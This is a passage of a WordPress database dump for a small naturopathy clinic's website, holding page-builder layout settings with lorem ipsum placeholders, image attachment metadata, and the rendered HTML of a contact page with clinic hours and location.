{\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#fff\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#fff\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"ele_bg_hover_delay\":\"400\",\"ele_padding\":\"5em,0em,4em,0em\",\"ele_padding_mobile\":\"4em,0em,0em,0em\",\"ele_padding_tablet\":\"4em,0em,0em,0em\",\"pagelayer-id\":\"xva9407\"} -->\n<!-- wp:pagelayer/pl_col {\"widget_space\":\"0\",\"overlay_hover_delay\":\"400\",\"ele_bg_hover_delay\":\"400\",\"pagelayer-id\":\"1kf9806\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-4px,0px,0px,0px\",\"text\":\"u003ch5u003eContact Usu003c/h5u003e\",\"pagelayer-id\":\"na83435\"} --><h5>Contact Us</h5><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"ele_bg_hover_delay\":\"400\",\"align\":\"center\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"-65px,0px,0px,0px\",\"ele_zindex\":\"-1\",\"heading_typo_tablet\":\",65,,,,,Solid,,,,\",\"heading_typo_mobile\":\",49,,,,,Solid,,,,\",\"text\":\"u003ch2u003eContact Usu003c/h2u003e\",\"pagelayer-id\":\"d0m3351\"} --><h2>Contact Us</h2><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"ele_bg_hover_delay\":\"400\",\"animation\":\"\",\"animation_delay\":\"600\",\"ele_margin\":\"1em,0em,2em,0em\",\"ele_padding_mobile\":\"0px,10px,0px,10px\",\"text\":\"u003cp style=u0022text-align: centeru0022u003eNulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. u003cbr /u003eAmet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.u003cbr /u003e Nibh venenatis cras sed felis eget velit aliquet sagittis.u003c/pu003e\",\"ele_custom_pos\":\"true\",\"ele_align\":\"50%\",\"ele_height\":\"auto\",\"ele_custom_width\":\"650px\",\"pagelayer-id\":\"uvu8493\"} --><p style=\"text-align: center\">Nulla posuere sollicitudin aliquam ultrices. Id consectetur purus ut faucibus pulvinar elementum integer enim. <br />Amet commodo nulla facilisi nullam vehicula. Eu turpis egestas pretium aenean pharetra.<br /> Nibh venenatis cras sed felis eget velit aliquet sagittis.</p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_inner_row {\"stretch\":\"auto\",\"col_gap\":\"10\",\"width_content\":\"auto\",\"row_height\":\"default\",\"overlay_hover_delay\":\"400\",\"row_shape_top_color\":\"#227bc3\",\"row_shape_top_width\":\"100\",\"row_shape_top_height\":\"100\",\"row_shape_bottom_color\":\"#e44993\",\"row_shape_bottom_width\":\"100\",\"row_shape_bottom_height\":\"100\",\"pagelayer-id\":\"0bz4538\"} -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"pagelayer-id\":\"qfb8540\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\"#111111\",\"heading_typo_mobile\":\",25,,,,,Solid,,,,\",\"text\":\"u003ch4u003eWrite Usu003c/h4u003e\",\"pagelayer-id\":\"o317574\"} --><h4>Write Us</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_contact {\"form\":\"contact-form\",\"name\":\"Contact Form\",\"form_position\":\"left\",\"space_label\":\",,10,\",\"input_padding\":\"6,10\",\"radio_padding\":\"10,10\",\"field_hover_delay\":\"400\",\"submit\":\"Submit\",\"type\":\"pagelayer-btn-custom\",\"size\":\"pagelayer-btn-small\",\"btn_hover_delay\":\"400\",\"icon_position\":\"pagelayer-btn-icon-left\",\"icon_spacing\":\"5\",\"ele_bg_hover_delay\":\"400\",\"placeholder_typo\":\",20,,,,,Solid,,,,\",\"field_border_type\":\"solid\",\"field_border_color\":\"#d9d8d89e\",\"field_border_width\":\"1,1,1,1\",\"btn_bg_color\":\"#eeaa6dff\",\"btn_color\":\"#ffffff\",\"placeholder_typo_mobile\":\",15,,,,,Solid,,,,\",\"placeholder_typo_tablet\":\",16,,,,,Solid,,,,\",\"animation\":\"\",\"animation_delay\":\"600\",\"input_state\":\"normal\",\"con_post_id\":\"4764\",\"form_input_bg\":\"#d9d8d871\",\"field_border_radius\":\"20,20,20,20\",\"field_state\":\"focus\",\"field_border_type_focus\":\"solid\",\"field_border_color_focus\":\"#efba6cff\",\"contact_custom_templ\":\"true\",\"cont_use_html\":\"true\",\"pagelayer-id\":\"pe25980\"} -->\n<!-- wp:pagelayer/pl_contact_item {\"label_name\":\"Name:\",\"field_type\":\"text\",\"values\":\"OnenTwo\",\"field_name\":\"name\",\"field_width\":\"NaN\",\"space_between\":\",,10,\",\"ele_bg_hover_delay\":\"400\",\"label_as_holder\":\"\",\"field_display\":\"\",\"field_width_mobile\":\"100\",\"pagelayer-id\":\"gfk9123\"} /-->\n<!-- wp:pagelayer/pl_contact_item {\"label_name\":\"Email:\",\"field_type\":\"email\",\"values\":\"OnenTwo\",\"field_name\":\"email\",\"field_width\":\"NaN\",\"space_between\":\"0,0,10,0\",\"ele_bg_hover_delay\":\"400\",\"label_as_holder\":\"\",\"field_display\":\"\",\"field_width_mobile\":\"100\",\"space_between_mobile\":\"0,0,10,0\",\"pagelayer-id\":\"1ia8162\"} /-->\n<!-- wp:pagelayer/pl_contact_item {\"label_name\":\"Message:\",\"field_type\":\"textarea\",\"values\":\"OnenTwo\",\"field_name\":\"message\",\"field_width\":\"NaN\",\"space_between\":\"0,0,10,0\",\"ele_bg_hover_delay\":\"400\",\"label_as_holder\":\"\",\"field_display\":\"\",\"textarea_rows\":\"4\",\"field_width_mobile\":\"100\",\"space_between_mobile\":\"0,0,0,0\",\"pagelayer-id\":\"obu4792\"} /-->\n<!-- /wp:pagelayer/pl_contact -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- wp:pagelayer/pl_inner_col {\"widget_space\":\"15\",\"overlay_hover_delay\":\"400\",\"col\":\"6\",\"pagelayer-id\":\"azf1206\"} -->\n<!-- wp:pagelayer/pl_heading {\"heading_state\":\"normal\",\"color\":\"#111111\",\"heading_typo_mobile\":\",25,,,,,Solid,,,,\",\"text\":\"u003ch4u003eFrequently Asked Questionsu003c/h4u003e\",\"pagelayer-id\":\"dlk6248\"} --><h4>Frequently Asked Questions</h4><!-- /wp:pagelayer/pl_heading -->\n<!-- wp:pagelayer/pl_text {\"text\":\"u003cpu003eFusce sodales, sapien ut venenatis scelerisque, nulla dui consectetur nisi, at auctor purus orci aliquam turpis. Nulla ac sagittis massa, a consequat ex. Morbi vestibulum mi fringilla sodales tincidunt. u003c/pu003e\",\"pagelayer-id\":\"cse8461\"} --><p>Fusce sodales, sapien ut venenatis scelerisque, nulla dui consectetur nisi, at auctor purus orci aliquam turpis. Nulla ac sagittis massa, a consequat ex. Morbi vestibulum mi fringilla sodales tincidunt. </p><!-- /wp:pagelayer/pl_text -->\n<!-- wp:pagelayer/pl_accordion {\"icon\":\"fas fa-plus-square\",\"active_icon\":\"fas fa-minus-square\",\"icon_align\":\"left\",\"icon_padding\":\"10\",\"tabs_color\":\"#444444\",\"tabs_bg_color\":\"\",\"tabs_active_color\":\"\",\"tabs_active_bg_color\":\"\",\"tab_padding\":\"15\",\"tabs_content_bg_color\":\"#fff\",\"acc_space\":\"10\",\"ele_css\":\"{{element}} .pagelayer-accordion-icon{ncolor: #EFBA6C;nfont-size: 20px;n}\",\"pagelayer-id\":\"tlq2635\"} -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How to became a VIP customer in your agency ?\",\"pagelayer-id\":\"j8m4303\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How can you get to work in your business ?\",\"pagelayer-id\":\"0wb3501\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How to became a VIP customer in your agency ?\",\"pagelayer-id\":\"f3u5485\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- wp:pagelayer/pl_accordion_item {\"title\":\"How can you become your external partner ?\",\"pagelayer-id\":\"u1j8345\"} --><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pulvinar nisl eget consectetur lobortis. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae.</p><!-- /wp:pagelayer/pl_accordion_item -->\n<!-- /wp:pagelayer/pl_accordion -->\n<!-- /wp:pagelayer/pl_inner_col -->\n<!-- /wp:pagelayer/pl_inner_row -->\n<!-- wp:pagelayer/pl_google_maps {\"zoom\":\"10\",\"height\":\"400\",\"ele_bg_hover_delay\":\"400\",\"ele_margin\":\"3em,0em,0em,0em\",\"ele_margin_tablet\":\"0px,0px,0px,0px\",\"ele_margin_mobile\":\"0px,0px,0px,0px\",\"address\":\"New York, New York, USA\",\"pagelayer-id\":\"8ed5144\"} -->New York, New York, USA<!-- /wp:pagelayer/pl_google_maps -->\n<!-- /wp:pagelayer/pl_col -->\n<!-- /wp:pagelayer/pl_row -->'),(425,165,'_wp_attached_file','2021/05/holistic-healer-02.jpg'),(426,165,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1139;s:4:\"file\";s:30:\"2021/05/holistic-healer-02.jpg\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"holistic-healer-02-1024x607.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:607;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-768x456.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:456;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"holistic-healer-02-1536x911.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:911;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:31:\"holistic-healer-02-1080x675.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-image-single\";a:4:{s:4:\"file\";s:31:\"holistic-healer-02-1080x641.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:641;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:4:\"file\";s:31:\"holistic-healer-02-1280x759.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-980x581.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:581;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:30:\"holistic-healer-02-480x285.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(427,26,'_et_pb_built_for_post_type','page'),(428,26,'_et_pb_ab_subjects',''),(429,26,'_et_pb_enable_shortcode_tracking',''),(430,26,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"26\" /]'),(431,26,'_et_pb_custom_css',''),(432,26,'_et_pb_gutter_width','3'),(433,26,'_thumbnail_id','0'),(434,26,'_global_colors_info','{}'),(435,26,'_et_pb_first_image',''),(436,26,'_et_pb_truncate_post','<p><div class=\"et_d4_element et_pb_section et_pb_section_0 et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_0 et_block_row\">\n <div class=\"et_d4_element et_pb_column_4_4 et_pb_column et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_0 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Let\'s connect.</p>\n<p>Email us at hello@verdenaturopathy.com.au or feel free to use the contact form below.</p></div>\n </div>\n </div>\n \n \n \n \n </div><div class=\"et_d4_element et_pb_row et_pb_row_1 et_block_row\">\n <div class=\"et_d4_element et_pb_column_1_2 et_pb_column et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n \n <div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_d4_element et_pb_contact_form_0 et_pb_contact_form_container clearfix et_block_module\" data-form_unique_num=\"0\" data-form_unique_id=\"\">\n \n \n \n \n \n <div class=\"et-pb-contact-message\"></div>\n \n <div class=\"et_pb_contact\">\n <form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://verdenaturopathy.com.au/?s=\">\n <p class=\"et_d4_element et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n \n \n \n \n <label for=\"et_pb_contact_name_0\" class=\"et_pb_contact_form_label\">Name</label>\n <input type=\"text\" id=\"et_pb_contact_name_0\" class=\"input\" value=\"\" name=\"et_pb_contact_name_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n </p><p class=\"et_d4_element et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n \n \n \n \n <label for=\"et_pb_contact_email_0\" class=\"et_pb_contact_form_label\">Email Address</label>\n <input type=\"text\" id=\"et_pb_contact_email_0\" class=\"input\" value=\"\" name=\"et_pb_contact_email_0\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n </p><p class=\"et_d4_element et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n \n \n \n \n <label for=\"et_pb_contact_message_0\" class=\"et_pb_contact_form_label\">Message</label>\n <textarea name=\"et_pb_contact_message_0\" id=\"et_pb_contact_message_0\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n </p>\n <input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_0\"/>\n <div class=\"et_contact_bottom_container\">\n \n <button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button\">Submit</button>\n </div>\n <input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-0\" name=\"_wpnonce-et-pb-contact-form-submitted-0\" value=\"25e6dda8ed\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s\" />\n </form>\n </div>\n </div>\n \n </div><div class=\"et_d4_element et_pb_column_1_2 et_pb_column et_pb_column_2 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_1 et_pb_text_align_left et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\">Clinic hours</p>\n<p>Tues: 9am-4pm<br />\nWed: 9:30am-4pm<br />\nThurs: 11am-7pm<br />\nSat: 9:30am-1pm</p>\n<p>Online consults available. Please get in touch if the above days/times are unsuitable.</p>\n<p>Clinic location<br />\nKalamunda (address given upon booking) & Mead Medical, Kalamunda (Tuesday mornings only) </div>\n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div><div class=\"et_d4_element et_pb_section et_pb_section_2 et_pb_with_background et_pb_section_parallax et_section_regular et_block_section\" >\n \n \n \n \n \n \n <div class=\"et_d4_element et_pb_row et_pb_row_2 et_block_row\">\n <div class=\"et_d4_element et_pb_column_4_4 et_pb_column et_pb_column_3 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_with_border et_pb_module et_d4_element et_pb_text et_pb_text_2 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\"><h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2></div>\n </div>\n </div>\n \n \n \n \n </div><div class=\"et_d4_element et_pb_row et_pb_row_3 et_block_row\">\n <div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_4 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_3 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\"><h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p></div>\n </div>\n </div><div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_5 et_pb_css_mix_blend_mode_passthrough et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_4 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n \n </div><div class=\"et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module \">\n <a class=\"et_pb_button et_d4_element et_pb_button_0 et_pb_bg_layout_dark et_block_module\" href=\"https://verdenaturopathy.com.au/bookings\">Make a booking</a>\n </div>\n </div><div class=\"et_d4_element et_pb_column_1_3 et_pb_column et_pb_column_6 et_pb_css_mix_blend_mode_passthrough et-last-child et_block_column\">\n \n \n \n \n <div class=\"et_pb_module et_d4_element et_pb_text et_pb_text_5 et_pb_text_align_center et_pb_bg_layout_light\">\n \n \n \n \n <div class=\"et_pb_text_inner\"><h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/</span><span style=\"font-family: Montserrat;\">Wed: 9am-4pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 11am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p></div>\n </div>\n </div>\n \n \n \n \n </div>\n \n \n </div></p>\n'),(718,458,'footnotes',''),(727,474,'footnotes',''),(719,459,'_wp_attached_file','2025/04/Screenshot_20250409_205525_Instagram.jpg'),(720,459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1079;s:6:\"height\";i:745;s:4:\"file\";s:48:\"2025/04/Screenshot_20250409_205525_Instagram.jpg\";s:8:\"filesize\";i:411084;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15821;}s:5:\"large\";a:5:{s:4:\"file\";s:49:\"Screenshot_20250409_205525_Instagram-1024x707.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:707;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111086;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7568;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-768x530.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72306;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23423;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:49:\"Screenshot_20250409_205525_Instagram-1079x675.jpg\";s:5:\"width\";i:1079;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118470;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26312;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41024;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46769;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-980x677.jpg\";s:5:\"width\";i:980;s:6:\"height\";i:677;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104522;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:48:\"Screenshot_20250409_205525_Instagram-480x331.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:331;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34501;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(721,460,'_wp_attached_file','2025/04/bg-tint.png'),(722,460,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1079;s:6:\"height\";i:745;s:4:\"file\";s:19:\"2025/04/bg-tint.png\";s:8:\"filesize\";i:745341;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"bg-tint-300x207.png\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:77233;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"bg-tint-1024x707.png\";s:5:\"width\";i:1024;s:6:\"height\";i:707;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:636852;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"bg-tint-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34361;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"bg-tint-768x530.png\";s:5:\"width\";i:768;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:396451;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:19:\"bg-tint-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116494;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:20:\"bg-tint-1079x675.png\";s:5:\"width\";i:1079;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:677530;}s:21:\"et-pb-portfolio-image\";a:5:{s:4:\"file\";s:19:\"bg-tint-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132432;}s:28:\"et-pb-portfolio-module-image\";a:5:{s:4:\"file\";s:19:\"bg-tint-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:214751;}s:35:\"et-pb-gallery-module-image-portrait\";a:5:{s:4:\"file\";s:19:\"bg-tint-400x516.png\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:251149;}s:31:\"et-pb-image--responsive--tablet\";a:5:{s:4:\"file\";s:19:\"bg-tint-980x677.png\";s:5:\"width\";i:980;s:6:\"height\";i:677;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:593348;}s:30:\"et-pb-image--responsive--phone\";a:5:{s:4:\"file\";s:19:\"bg-tint-480x331.png\";s:5:\"width\";i:480;s:6:\"height\";i:331;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:176622;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(724,462,'_wp_attached_file','2025/04/Untitled-design.png'),(725,462,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1079;s:6:\"height\";i:745;s:4:\"file\";s:27:\"2025/04/Untitled-design.png\";s:8:\"filesize\";i:624582;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"Untitled-design-300x207.png\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66589;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"Untitled-design-1024x707.png\";s:5:\"width\";i:1024;s:6:\"height\";i:707;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:533678;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Untitled-design-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29713;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"Untitled-design-768x530.png\";s:5:\"width\";i:768;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:334208;}s:21:\"et-pb-post-main-image\";a:5:{s:4:\"file\";s:27:\"Untitled-design-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99329;}s:31:\"et-pb-post-main-image-fullwidth\";a:5:{s:4:\"file\";s:28:\"Untitled-design-1079x675.png\";s:5:\"width\";i:1079;s:6:\"height\";i:675;s:9:\"mime-type\";s:9:\"image/png\";s